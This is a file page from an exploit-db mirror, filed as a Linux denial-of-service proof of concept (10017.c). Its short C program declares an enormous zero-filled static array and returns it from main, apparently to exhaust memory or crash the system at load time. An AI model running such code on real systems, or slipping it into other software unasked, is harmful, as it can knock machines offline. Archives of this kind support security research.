exploit-db-mirror/platforms/linux/dos/10017.c
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

7 lines
No EOL
80 B
C
Executable file

int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}